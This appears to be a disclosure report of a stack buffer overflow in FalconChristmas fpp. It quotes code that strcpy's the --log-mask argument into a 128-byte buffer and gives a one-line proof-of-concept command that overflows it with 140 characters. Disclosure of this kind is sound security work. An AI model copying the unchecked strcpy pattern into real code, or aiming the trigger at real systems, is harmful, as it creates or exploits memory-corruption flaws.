Stack-based Buffer Overflow in falconchristmas/fpp
Valid
Reported on
May 30th 2021
✍️ Description
Hi,
There is a stack based buffer overflow in https://github.com/FalconChristmas/fpp/blob/f4a1621c8be15a41305269830b700a2b5443aa0f/src/fpp.c#L177
:
else if((strcmp(argv[1],"--log-mask") == 0) && argc > 2)
{
char newMask[128];
strcpy(newMask, argv[2]);//overflow
/**/
}
argv[2]
is copied into newMask
using strcpy
, a fucntion that doesn't perform size validation when it copies buffers.
This behavior leads to a buffer overflow.
🕵️♂️ Proof of Concept
Run : ./fpp --log-mask $(python -c'print("A"*140)')
💥 Impact
Crash, arbitrary code execution
Occurrences
to join this conversation